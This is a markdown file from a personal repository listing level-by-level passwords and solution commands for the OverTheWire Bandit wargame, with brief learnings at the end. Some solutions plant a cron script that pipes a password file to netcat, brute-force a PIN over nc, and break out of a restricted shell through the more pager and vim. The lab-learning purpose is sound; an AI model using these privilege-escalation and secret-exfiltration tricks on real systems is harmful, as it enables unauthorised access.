emileclarkb/ctfs
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
ctfs/overthewire/bandit/passwords.md
Emile Clark-Boman 500329a86b OverTheWire
2025-07-15 22:44:06 +10:00

5.8 KiB
Raw Permalink Blame History

bandit0: bandit0 bandit1: ZjLjTmM6FvvyRnrb2rfNWOZOTa6ip5If cat readme bandit2: 263JGJPfgU6LtdEvgfWU1XP5yac29mFx cat ./- bandit3: MNk8KNH3Usiio41PRUEoDFPqfxLPlSmx bandit4: 2WmrDFRmJIq3IPxneAaMGhap0pFhF3NJ bandit5: 4oQYVPkxZOOEOO5pTW81FB8j8lxXGUQw bandit6: HWasnPhtq9AVKe0dmk45nxy20cvUa6EG find inhere/ -type f -print 2>/dev/null | xargs -d '\n' ls -l | grep 1033 bandit7: morbNTDkSW6jIlUc0ymOdMaLnOlFVAaj cat $(find / -type f -user bandit7 -group bandit6 2>/dev/null) bandit8: dfwvzFQi4mU0wfNbFOe9RoWskMLg7eEc <data.txt grep millionth bandit9: 4CKMh1JI91bUIZZPXDqGanal4xvAg0JM sort data.txt | uniq -u bandit10: FGUW5ilLVJrxX9kMYMmlN4MgbpfMiqey strings data.txt | grep "^==" bandit11: dtR173fZKb0RRsDFSGsg2RWnpNVj3qRr cat data.txt | base64 -d bandit12: 7x16WNeHIi5YkIhWsfFIqoognUTyj9Q4 <data.txt tr 'A-Za-z' 'N-ZA-Mn-za-m' bandit13: FO5dwFsc0cbaIiH0h8J2eUks2vdTDwAn bash #!/usr/bin/env bash set -e WORKING=$(mktemp -d) xxd -r ~/data.txt $WORKING/data.bin # then run `tar xf`, `gzip -d`, `bzip2 -d` a million times bandit14: MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS bash #!/usr/bin/env bash KEY="./id_bandit14" scp -P 2220 bandit13@bandit.labs.overthewire.org:~/sshkey.private $KEY ssh-keygen -y -f $KEY > "$KEY.pub" chmod 600 $KEY* # login with private key ssh bandit14@bandit.labs.overthewire.org -p 2220 -i ./id_bandit14 # >>> echo /etc/bandit_pass/bandit14 bandit15: 8xCjnmgoKbGLhHFAZlGE5Tmu4M2tKJQo echo "MU4VWeTyJk8ROof1qqmcBPaLh7lDCPvS" | nc localhost 30000 bandit16: kSkvUpMQ7lBYyCM4GBPvCvT1BfWRy0Dx openssl s_client -connect localhost:30001 bandit17: STORED IN keys/id_bandit17* bash # get all open ports nmap localhost -T5 -p31000-32000 | grep open | awk '{print substr($1, 1, 5)}' bandit18: x2gLTTjFwMOhQ8oWNbMN362QKxfRqGlO diff passwords.old passwords.new bandit19: cGWpMaKXVwDUNgPAVJbWYuGHVn9zl3j8 ssh bandit19@bandit.labs.overthewire.org -p 2220 -t /bin/sh bandit20: 0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO ./bandit20-do cat /etc/bandit_pass/bandit20 bandit21: EeoULMCra2q0dSkYj561DX7s1CpBuOBt tmux new -s imbaud # Ctrl-b + " BOX=$(mktemp) && echo "0qXahG8ZjOVMN9Ghs7iOWsCfZyXOUbYO" > $BOX && <$BOX nc -l -p 5555 # Ctrl-b + o ~/suconnect 5555 bandit22: tRae0UfB9v0UzbCdn9cY0gQnds9GF58Q /etc/cron.d/cronjob_bandit22 references binary /usr/bin/cronjob_bandit22.sh which complains about bad privileges for /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv then cat out the temp file and BOOM bandit23: 0Zf11ioIjMVN551jX3CmStKLYqjk54Ga Similar solution to previous one with /etc/cron.d/cronjob_bandit23 cat /tmp/$(echo I am user bandit23 | md5sum | cut -d ' ' -f 1) bandit24: gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8 bash # terminal 1: nc -l -p 5555 # terminal 2: echo -e "#\!/bin/bash\ncat /etc/bandit_pass/bandit24 | nc localhost 5555" > /var/spool/bandit24/foo/gibme bandit25: iCi86ttT4KSNe1armKiwbQNmB3YJP3q4 '''bash python3 -c "from itertools import product; [print(''.join(D)) for D in product((str(x) for x in range(10)), repeat=4)]" | xargs -L1 echo "gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8" | nc localhost 30002 | grep -v "Wrong" ''' bandit26: s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ First copy the private key from bandit25's home Then cat /etc/passwd | grep bandit26 to find what shell bandit26 uses: # bandit2611026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext cat /usr/bin/showtext to see it runs the more pager then exits. more will enter "command" mode if the terminal window is too small to view the paged contents, which allows us to run the v command which opens the content in vim instead. Next, do :set shell=/bin/bash and then run vim's :shell to GTFO

bandit27: upsNCc7vzaRDx6oZC6GiR6ERwe1MowGB From bandit26 in bash: ./bandit27-do cat /etc/bandit_pass/bandit27 bandit28: Yz9IpL0sBcCeuG7m9uQFt8ZNpS4HZRcN bash BOX=$(mktemp -d); echo $BOX git clone ssh://bandit27-git@localhost:2220/home/bandit27-git/repo $BOX # use same password as bandit27 login cd $BOX # then check README bandit29: 4pT1t5DENaYuqnqvadYs1oE4QLCdjmJ7 Do same as bandit28 for /home/bandit28-git/repo, then: git show fb0df1358b1ff146f581651a84bae622353a71c0:README.md bandit30: qp30ex3VLz5MDG1n91YowTv4Q8l7CDZL Do what bandit29 did but then: bash git branch -r # list all remote branches git fetch --all bandit31: fb5S2xb7bRyFmAvQYQGEqsbhVyJqhnDy Similar to bandit30 but use: bash git tag git show secret # show the "secret" tag bandit32: 3O9RfhqyAlVBEZpVb6LYStshZoqoSx5K Simply rm .gitignore then git add .; git commit -m "AHHHHH"; git push -u origin bandit33: tQdtbs5D5i2vJwkO8mEyYEyTL8izoeJ0 bash # use symbols since uppercase messes everything up $0 # the shell runs "sh <CMD>" so "sh $0" => "sh sh" cat /etc/bandit_pass/bandit33 

>>> bandit33@bandit:~/README.md <<<
Congratulations on solving the last level of this game!

At this moment, there are no more levels to play in this game. However, we are constantly working
on new levels and will most likely expand this game with more levels soon.
Keep an eye out for an announcement on our usual communication channels!
In the meantime, you could play some of our other wargames.

If you have an idea for an awesome new level, please let us know!

Learnings:

Connect over SSL/TLS (like telnet/nc does) using openssl:
	`openssl s_client -connect HOST:PORT -quiet`
	Note: commands starting with "k" will trigger "KEYUPDATE"
		  run openssl with the `-quiet` flag to avoid this	
	https://docs.openssl.org/3.0/man1/openssl-s_client/#connected-commands
	
The pager "more" goes into a command mode if the terminal is too small to display
the content. Which allows us to run any command we want.

Git:
	git show <COMMIT>:file/path/here # print a file content at specific hash
	git branch -r # list all branches stored on the remote